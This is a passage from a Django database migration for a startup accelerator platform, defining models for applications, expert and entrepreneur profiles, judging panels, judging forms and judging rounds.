import sorl.thumbnail.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
('fluent_pages', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Application',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('application_status', models.CharField(blank=True, choices=[('incomplete', 'Incomplete'), ('complete', 'Complete'), ('submitted', 'Submitted')], max_length=64, null=True)),
('submission_datetime', models.DateTimeField(blank=True, null=True)),
],
options={
'verbose_name_plural': 'Applications',
'db_table': 'accelerator_application',
'ordering': ['startup'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_APPLICATION_MODEL',
},
),
migrations.CreateModel(
name='ApplicationAnswer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('answer_text', models.CharField(blank=True, max_length=2000)),
('application', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATION_MODEL)),
],
options={
'verbose_name_plural': 'Application Answers',
'db_table': 'accelerator_applicationanswer',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_APPLICATIONANSWER_MODEL',
},
),
migrations.CreateModel(
name='ApplicationPanelAssignment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('panel_slot_number', models.IntegerField(blank=True, null=True)),
('notes', models.CharField(blank=True, max_length=200)),
('remote_pitch', models.BooleanField(default=False)),
('application', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATION_MODEL)),
],
options={
'verbose_name_plural': 'assignments of startup applications to panel',
'db_table': 'accelerator_applicationpanelassignment',
'ordering': ('panel_slot_number',),
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_APPLICATIONPANELASSIGNMENT_MODEL',
},
),
migrations.CreateModel(
name='ApplicationQuestion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('question_number', models.IntegerField()),
('section_heading', models.CharField(blank=True, max_length=40)),
('question_text', models.CharField(blank=True, max_length=200)),
('help_text', models.CharField(blank=True, max_length=1000)),
('question_type', models.CharField(choices=[('multiline', 'MultilineText'), ('multichoice', 'MultipleChoice'), ('number', 'Number')], max_length=64)),
('mandatory', models.BooleanField(default=False)),
('text_box_lines', models.IntegerField(default=1)),
('text_limit', models.IntegerField(default=500)),
('text_limit_units', models.CharField(blank=True, choices=[('characters', 'Characters'), ('words', 'Words')], max_length=64)),
('choice_options', models.CharField(blank=True, max_length=4000)),
('choice_layout', models.CharField(blank=True, choices=[('horizontal', 'Horizontal'), ('vertical', 'Vertical'), ('dropdown', 'Dropdown')], max_length=64)),
],
options={
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_APPLICATIONQUESTION_MODEL',
},
),
migrations.CreateModel(
name='ApplicationType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=50)),
('description', models.CharField(blank=True, max_length=500)),
],
options={
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_APPLICATIONTYPE_MODEL',
},
),
migrations.CreateModel(
name='BaseProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('user_type', models.CharField(choices=[('EXPERT', 'Expert'), ('ENTREPRENEUR', 'Entrepreneur'), ('MEMBER', 'Member')], max_length=16)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='baseprofile', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'accelerator_baseprofile',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_BASEPROFILE_MODEL',
},
),
migrations.CreateModel(
name='BucketState',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('basis', models.CharField(choices=[('cycle', 'Cycle'), ('program', 'Program')], default='cycle', max_length=20)),
('name', models.CharField(blank=True, choices=[('stale_nostartup', 'Old Entrepreneurs'), ('stale_startup', 'Old Startups'), ('new_entrepreneurs', 'New Entrepreneurs'), ('unpaid', 'Active Unpaid Startups'), ('unsubmitted', 'Working on Application'), ('submitted', 'Has Submitted Application'), ('new_experts', 'New Experts')], default='unsubmitted', max_length=64, null=True)),
('group', models.CharField(default='Other', max_length=255)),
('sort_order', models.PositiveIntegerField()),
('last_update', models.DateTimeField()),
],
options={
'db_table': 'accelerator_bucketstate',
'ordering': ['sort_order'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_BUCKETSTATE_MODEL',
},
),
migrations.CreateModel(
name='CategoryHeaderPage',
fields=[
('urlnode_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='fluent_pages.UrlNode')),
('is_category_header', models.BooleanField(default=True)),
],
options={
'verbose_name': 'Category Header',
'verbose_name_plural': 'Category Headers',
'db_table': 'pagetype_accelerator_categoryheaderpage',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_CATEGORYHEADERPAGE_MODEL',
'manager_inheritance_from_future': True,
},
bases=('fluent_pages.page',),
),
migrations.CreateModel(
name='Clearance',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('level', models.CharField(choices=[('Exec/MD', 'Exec/MD'), ('Global Manager', 'Global Manager'), ('Program Operations Manager', 'Program Operations Manager'), ('Staff', 'Staff')], max_length=64)),
],
options={
'db_table': 'accelerator_clearance',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_CLEARANCE_MODEL',
},
),
migrations.CreateModel(
name='Criterion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('type', models.CharField(max_length=64)),
('name', models.CharField(max_length=64)),
],
options={
'verbose_name': 'Application Allocator Criterion',
'verbose_name_plural': 'Application Allocator Criteria',
'db_table': 'accelerator_criterion',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_CRITERION_MODEL',
},
),
migrations.CreateModel(
name='CriterionOptionSpec',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('option', models.CharField(blank=True, max_length=64)),
('count', models.IntegerField(default=1)),
('weight', models.FloatField(default=1.0)),
('criterion', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_CRITERION_MODEL)),
],
options={
'verbose_name': 'Application Allocator Criterion Option',
'db_table': 'accelerator_criterionoptionspec',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_CRITERIONOPTIONSPEC_MODEL',
},
),
migrations.CreateModel(
name='Currency',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=64, unique=True)),
('abbr', models.CharField(max_length=3, unique=True)),
('usd_exchange', models.FloatField()),
],
options={
'db_table': 'accelerator_currency',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_CURRENCY_MODEL',
},
),
migrations.CreateModel(
name='EntrepreneurProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('gender', models.CharField(choices=[('f', 'Female'), ('m', 'Male'), ('p', 'Prefer Not To State'), ('o', 'Other'), ('', 'Unknown')], default='', max_length=1)),
('phone', models.CharField(blank=True, max_length=20, validators=[django.core.validators.RegexValidator(message='Digits and +()-.x only', regex='^[0-9x.+() -]+$')], verbose_name='Phone')),
('linked_in_url', models.URLField(blank=True, verbose_name='LinkedIn profile URL')),
('facebook_url', models.URLField(blank=True, verbose_name='Facebook profile URL')),
('twitter_handle', models.CharField(blank=True, max_length=40, verbose_name='Twitter handle')),
('personal_website_url', models.URLField(blank=True, max_length=255, verbose_name='Website URL')),
('landing_page', models.CharField(blank=True, max_length=200, validators=[django.core.validators.RegexValidator('^[^:]*$', 'Must be a page within the site')], verbose_name='Current landing page within the site')),
('image', sorl.thumbnail.fields.ImageField(blank=True, help_text='Suggested size: <400px on the short side', upload_to='profile_pics', verbose_name='Profile Picture')),
('drupal_id', models.IntegerField(blank=True, null=True)),
('drupal_creation_date', models.DateTimeField(blank=True, null=True)),
('drupal_last_login', models.DateTimeField(blank=True, null=True)),
('users_last_activity', models.DateTimeField(blank=True, null=True)),
('newsletter_sender', models.BooleanField(default=False)),
('bio', models.TextField(blank=True, default='')),
],
options={
'db_table': 'accelerator_entrepreneurprofile',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_ENTREPRENEURPROFILE_MODEL',
},
),
migrations.CreateModel(
name='ExpertCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=255, unique=True)),
],
options={
'verbose_name': 'Expert Category',
'verbose_name_plural': 'Expert Categories',
'db_table': 'accelerator_expertcategory',
'ordering': ['name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_EXPERTCATEGORY_MODEL',
},
),
migrations.CreateModel(
name='ExpertInterest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('topics', models.TextField(blank=True, help_text='Please provide a list of topics of interest to yo')),
],
options={
'verbose_name_plural': 'Expert Interests',
'db_table': 'accelerator_expertinterest',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_EXPERTINTEREST_MODEL',
},
),
migrations.CreateModel(
name='ExpertInterestType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=50)),
('short_description', models.CharField(max_length=255)),
],
options={
'verbose_name_plural': 'Expert Interest Types',
'db_table': 'accelerator_expertinteresttype',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_EXPERTINTERESTTYPE_MODEL',
},
),
migrations.CreateModel(
name='ExpertProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('gender', models.CharField(choices=[('f', 'Female'), ('m', 'Male'), ('p', 'Prefer Not To State'), ('o', 'Other'), ('', 'Unknown')], default='', max_length=1)),
('phone', models.CharField(blank=True, max_length=20, validators=[django.core.validators.RegexValidator(message='Digits and +()-.x only', regex='^[0-9x.+() -]+$')], verbose_name='Phone')),
('linked_in_url', models.URLField(blank=True, verbose_name='LinkedIn profile URL')),
('facebook_url', models.URLField(blank=True, verbose_name='Facebook profile URL')),
('twitter_handle', models.CharField(blank=True, max_length=40, verbose_name='Twitter handle')),
('personal_website_url', models.URLField(blank=True, max_length=255, verbose_name='Website URL')),
('landing_page', models.CharField(blank=True, max_length=200, validators=[django.core.validators.RegexValidator('^[^:]*$', 'Must be a page within the site')], verbose_name='Current landing page within the site')),
('image', sorl.thumbnail.fields.ImageField(blank=True, help_text='Suggested size: <400px on the short side', upload_to='profile_pics', verbose_name='Profile Picture')),
('drupal_id', models.IntegerField(blank=True, null=True)),
('drupal_creation_date', models.DateTimeField(blank=True, null=True)),
('drupal_last_login', models.DateTimeField(blank=True, null=True)),
('users_last_activity', models.DateTimeField(blank=True, null=True)),
('newsletter_sender', models.BooleanField(default=False)),
('salutation', models.CharField(blank=True, max_length=255)),
('title', models.CharField(max_length=255, verbose_name='Professional Title')),
('company', models.CharField(max_length=255, verbose_name='Company Name')),
('privacy_email', models.CharField(choices=[('staff', 'MC Staff Only'), ('finalists and staff', 'Finalists and MC Staff'), ('public', 'All Users')], default='finalists and staff', max_length=64, verbose_name='Privacy - Email')),
('privacy_phone', models.CharField(choices=[('staff', 'MC Staff Only'), ('finalists and staff', 'Finalists and MC Staff'), ('public', 'All Users')], default='finalists and staff', max_length=64, verbose_name='Privacy - Phone')),
('privacy_web', models.CharField(choices=[('staff', 'MC Staff Only'), ('finalists and staff', 'Finalists and MC Staff'), ('public', 'All Users')], default='finalists and staff', max_length=64, verbose_name='Privacy - Web')),
('public_website_consent', models.BooleanField(default=False, verbose_name='Public Website Consent')),
('public_website_consent_checked', models.BooleanField(default=False, verbose_name='Public Website Consent Check')),
('judge_interest', models.BooleanField(default=False, help_text='I would like to participate in MassChallenge as a Judge', verbose_name='Judge')),
('mentor_interest', models.BooleanField(default=False, help_text='I would like to participate in MassChallenge as a Mentor', verbose_name='Mentor')),
('speaker_interest', models.BooleanField(default=False, help_text='I would like to participate in MassChallenge as a Speaker', verbose_name='Speaker')),
('speaker_topics', models.TextField(blank=True, help_text='Please describe the topic(s) you would be available to speak about', verbose_name='Speaker Topics')),
('office_hours_interest', models.BooleanField(default=False, help_text='I would like to participate in MassChallenge by holding Office Hours', verbose_name='Office Hours')),
('office_hours_topics', models.TextField(blank=True, help_text='Please describe the topic(s) you would be available to speak to Finalists about during Office Hours', verbose_name='Office Hour Topics')),
('expert_group', models.CharField(blank=True, max_length=10, verbose_name='Expert Group')),
('reliability', models.DecimalField(blank=True, decimal_places=2, default=Decimal('1.00'), max_digits=3, null=True)),
('referred_by', models.TextField(blank=True, help_text='If someone referred you to MassChallenge, please provide their name (and organization if relevant). Otherwise, please indicate how you learned about the opportunity to participate at MassChallenge (helps us understand the effectiveness of our outreach programs).', max_length=500)),
('other_potential_experts', models.TextField(blank=True, help_text="We're always looking for more great experts to join the MassChallenge community and program. We welcome the names and contact info (email) of individuals you think could be great additions to the program, as well as how you think they might want to be involved (Judge, Mentor, etc.) Also, please encourage these individuals to fill out their own Expert Profile.", max_length=500)),
('internal_notes', models.TextField(blank=True, help_text='Internal notes only for use by MassChallenge Staff (not visible to Expert)', max_length=500)),
('bio', models.TextField(blank=True, default='', validators=[django.core.validators.MaxLengthValidator(7500)])),
],
options={
'db_table': 'accelerator_expertprofile',
'permissions': (('change_password', 'Can change users passwords directly'),),
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_EXPERTPROFILE_MODEL',
},
),
migrations.CreateModel(
name='FilePage',
fields=[
('urlnode_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='fluent_pages.UrlNode')),
('file', models.FileField(storage=accelerator_abstract.models.secure_file_system_storage.SecureFileSystemStorage(location='/var/www/cms-files'), upload_to='%Y-%m')),
('description', models.TextField(blank=True)),
],
options={
'verbose_name': 'File',
'verbose_name_plural': 'Files',
'db_table': 'pagetype_accelerator_filepage',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_FILEPAGE_MODEL',
'manager_inheritance_from_future': True,
},
bases=('fluent_pages.page',),
),
migrations.CreateModel(
name='FunctionalExpertise',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=255)),
('lft', models.PositiveIntegerField(db_index=True, editable=False)),
('rght', models.PositiveIntegerField(db_index=True, editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(db_index=True, editable=False)),
('parent', mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to=settings.MPTT_SWAPPABLE_FUNCTIONALEXPERTISE_MODEL)),
],
options={
'db_table': 'accelerator_functionalexpertise',
'abstract': False,
'managed': True,
'swappable': 'MPTT_SWAPPABLE_FUNCTIONALEXPERTISE_MODEL',
},
),
migrations.CreateModel(
name='Industry',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=255)),
('icon', models.CharField(blank=True, max_length=50)),
('lft', models.PositiveIntegerField(db_index=True, editable=False)),
('rght', models.PositiveIntegerField(db_index=True, editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(db_index=True, editable=False)),
('parent', mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', to=settings.MPTT_SWAPPABLE_INDUSTRY_MODEL)),
],
options={
'verbose_name_plural': 'Industries',
'db_table': 'accelerator_industry',
'abstract': False,
'swappable': 'MPTT_SWAPPABLE_INDUSTRY_MODEL',
},
),
migrations.CreateModel(
name='InterestCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=127)),
('description', models.CharField(blank=True, max_length=500)),
],
options={
'verbose_name_plural': 'Interest Categories',
'db_table': 'accelerator_interestcategory',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_INTERESTCATEGORY_MODEL',
},
),
migrations.CreateModel(
name='JobPosting',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('postdate', models.DateTimeField()),
('type', models.CharField(choices=[('NONE', 'None'), ('INTERNSHIP', 'An internship'), ('PART_TIME_PERMANENT', 'A part-time permanent position'), ('FULL_TIME_PERMANENT', 'A full-time permanent position'), ('PART_TIME_CONTRACT', 'A part-time contract position'), ('FULL_TIME_CONTRACT', 'A full-time contract position')], max_length=20)),
('title', models.CharField(max_length=100)),
('description', models.TextField()),
('applicationemail', models.EmailField(blank=True, max_length=100, null=True, verbose_name='Email address')),
('more_info_url', models.URLField(blank=True, max_length=100, null=True)),
],
options={
'verbose_name_plural': 'Job postings for startups',
'db_table': 'accelerator_jobposting',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JOBPOSTING_MODEL',
},
),
migrations.CreateModel(
name='JudgeApplicationFeedback',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('judging_status', models.IntegerField(blank=True, choices=[(1, 'No Conflict'), (2, 'Not Judged - Conflict of Interest'), (3, 'Not Judged - Other (eg., no show)')], null=True)),
('feedback_status', models.CharField(choices=[('COMPLETE', 'COMPLETE'), ('INCOMPLETE', 'INCOMPLETE'), ('NOT-JUDGED-CONFLICT', 'NOT JUDGED, CONFLICT'), ('NOT-JUDGED-OTHER', 'NOT JUDGED, OTHER')], editable=False, max_length=20)),
('application', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATION_MODEL)),
],
options={
'verbose_name_plural': 'Judge Application Feedback',
'db_table': 'accelerator_judgeapplicationfeedback',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JUDGEAPPLICATIONFEEDBACK_MODEL',
},
),
migrations.CreateModel(
name='JudgeAvailability',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('availability_type', models.CharField(choices=[('Available', 'Available'), ('Not Available', 'Not Available'), ('Preferred', 'Preferred')], max_length=32)),
],
options={
'verbose_name_plural': 'Judge availability for specific Panel types, times, locations',
'db_table': 'accelerator_judgeavailability',
'ordering': ['panel_time__start_date_time', 'panel_type__panel_type', 'panel_location__location'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JUDGEAVAILABILITY_MODEL',
},
),
migrations.CreateModel(
name='JudgeFeedbackComponent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('answer_text', models.TextField(blank=True)),
('original_answer_text', models.TextField(blank=True)),
],
options={
'verbose_name_plural': 'Feedback Components',
'db_table': 'accelerator_judgefeedbackcomponent',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JUDGEFEEDBACKCOMPONENT_MODEL',
},
),
migrations.CreateModel(
name='JudgePanelAssignment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('assignment_status', models.CharField(blank=True, choices=[('ASSIGNED', 'ASSIGNED'), ('COMPLETE', 'COMPLETE')], default='', max_length=16)),
('panel_sequence_number', models.PositiveIntegerField(blank=True, help_text='Indicate in which order this panel should be completed by this judge', null=True)),
('judge', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'assignments of judge to panel',
'db_table': 'accelerator_judgepanelassignment',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JUDGEPANELASSIGNMENT_MODEL',
},
),
migrations.CreateModel(
name='JudgeRoundCommitment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('commitment_state', models.BooleanField(default=True)),
('capacity', models.IntegerField(default=0)),
('current_quota', models.IntegerField(blank=True, null=True)),
('judge', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Judge commitment to participate in a Judging Round',
'db_table': 'accelerator_judgeroundcommitment',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JUDGEROUNDCOMMITMENT_MODEL',
},
),
migrations.CreateModel(
name='JudgingForm',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('name', models.CharField(max_length=50)),
('description', models.CharField(blank=True, max_length=500)),
],
options={
'verbose_name_plural': 'Judging Forms',
'db_table': 'accelerator_judgingform',
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JUDGINGFORM_MODEL',
},
),
migrations.CreateModel(
name='JudgingFormElement',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('element_number', models.IntegerField()),
('element_name', models.CharField(blank=True, max_length=50)),
('dashboard_label', models.CharField(blank=True, max_length=50)),
('section_heading', models.CharField(blank=True, max_length=40)),
('question_text', models.CharField(blank=True, max_length=200)),
('help_text', models.CharField(blank=True, max_length=1000)),
('element_type', models.CharField(choices=[('answer', 'Application Answer'), ('boilerplate', 'Boilerplate'), ('feedback', 'Feedback')], max_length=64)),
('feedback_type', models.CharField(blank=True, choices=[('multiline', 'MultilineText'), ('multichoice', 'MultipleChoice'), ('number', 'Number')], max_length=64)),
('display_value', models.CharField(choices=[('omit', 'Omit'), ('value', 'Value'), ('yesno', 'Yes/No')], max_length=64)),
('score_element', models.BooleanField(default=False)),
('mandatory', models.BooleanField(default=False)),
('text_box_lines', models.IntegerField(blank=True, default=0, null=True)),
('text_limit', models.IntegerField(blank=True, default=0, null=True)),
('text_limit_units', models.CharField(blank=True, choices=[('characters', 'Characters'), ('words', 'Words')], max_length=64)),
('text_minimum', models.IntegerField(blank=True, default=0, null=True)),
('text_minimum_units', models.CharField(blank=True, choices=[('characters', 'Characters'), ('words', 'Words')], max_length=64)),
('choice_options', models.CharField(blank=True, max_length=200)),
('choice_layout', models.CharField(blank=True, choices=[('horizontal', 'Horizontal'), ('vertical', 'Vertical'), ('dropdown', 'Dropdown')], max_length=64)),
('sharing', models.CharField(blank=True, choices=[('share-with-startup', 'Share with Startup'), ('administrator-only', 'Share with Program Administrators')], max_length=64)),
('application_question', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_APPLICATIONQUESTION_MODEL)),
('form_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.ACCELERATOR_JUDGINGFORM_MODEL)),
],
options={
'verbose_name_plural': 'Judging Form Elements',
'db_table': 'accelerator_judgingformelement',
'ordering': ['form_type', 'element_number'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JUDGINGFORMELEMENT_MODEL',
},
),
migrations.CreateModel(
name='JudgingRound',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
('cycle_based_round', models.BooleanField(default=False, help_text="Include startups from all programs in this Program's cycle")),
('name', models.CharField(max_length=60)),
('start_date_time', models.DateTimeField(default=None)),
('end_date_time', models.DateTimeField(default=None)),
('is_active', models.BooleanField(default=False)),
('round_type', models.CharField(choices=[('Online', 'Online'), ('In-Person', 'In-Person')], max_length=10)),
('allow_dynamic_allocation', models.BooleanField(default=False, help_text='Check this button to allow judges to get new applications without manual allocation by staff.')),
('buffer_before_event', models.IntegerField(choices=[(0, 0), (15, 15), (30, 30), (45, 45), (60, 60), (75, 75), (90, 90), (105, 105), (120, 120)], default=30, help_text='Choose a time in increments of 15 minutes.')),
('recruit_judges', models.CharField(choices=[('NO', 'Do not recruit judges or display prior commitments'), ('ANYONE', 'Recruit any expert'), ('APPROVEDONLY', 'Recruit only approved judges'), ('DISPLAYONLY', 'Only display judges prior commitments')], default='NO', max_length=16)),
('recruiting_prompt', models.TextField(blank=True, help_text='You may use HTML, including links')),
('positive_recruiting_prompt', models.TextField(blank=True, help_text='You may use HTML, including links', verbose_name='Positive Recruiting Response Label')),
('negative_recruiting_prompt', models.TextField(blank=True, help_text='You may use HTML, including links', verbose_name='Negative Recruiting Response Label')),
('capture_capacity', models.BooleanField(default=False)),
('capacity_prompt', models.TextField(blank=True, help_text='You may use HTML, including links')),
('capacity_options', models.CharField(blank=True, help_text="Provide a list of integers, separated by '|' (like 10|20|30)", max_length=255, validators=[accelerator_abstract.utils.validate_capacity_options])),
('capture_availability', models.CharField(choices=[('disabled', 'Disabled'), ('location-only', 'Capture location only'), ('time-only', 'Capture time only'), ('type-only', 'Capture type only')], default='disabled', max_length=32)),
('feedback_display', models.CharField(choices=[('disabled', 'Disabled'), ('enabled', 'Enabled')], default='disabled', max_length=10)),
('feedback_display_message', models.TextField(blank=True, help_text='You may use HTML, including links (not relevant if merged with another round)')),
('feedback_display_items', models.CharField(blank=True, choices=[('feedback-and-judge-category', 'Judge Category and Feedback'), ('feedback-only', 'Only Feedback'), ('judge-category-only', 'Only Judge Category')], help_text='Not relevant if merged with another round', max_length=64)),
('judge_instructions', models.TextField(blank=True, help_text='Instructions to present to judges in this round on their judging portal.')),
('presentation_mins', models.IntegerField(blank=True, default=20, help_text='Duration of startup pitch to judges, in minutes')),
('buffer_mins', models.IntegerField(blank=True, default=10, help_text='Time between startup pitches, in minutes')),
('break_mins', models.IntegerField(blank=True, default=10, help_text="Duration of judges' coffee break(s), in minutes")),
('num_breaks', models.IntegerField(blank=True, default=1, help_text='Number of breaks the judges will be given during a judging panel')),
('collision_detection_mode', models.CharField(choices=[('scenario', 'Check that applications are not added to a scenario twice'), ('panel_time', 'Check that applications are not added to the same panel time within active scenarios twice'), ('panel_slot', 'Check that applications are not added to the same panel time and slot within active scenarios twice')], default='scenario', max_length=10)),
],
options={
'verbose_name_plural': 'Judging Rounds',
'db_table': 'accelerator_judginground',
'ordering': ['program__program_status', '-program__end_date', '-end_date_time', 'name'],
'abstract': False,
'managed': True,
'swappable': 'ACCELERATOR_JUDGINGROUND_MODEL',
},
),
migrations.CreateModel(
name='LegalCheck',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True, null=True)),
('updated_at', models.DateTimeField(auto_now=True, null=True)),
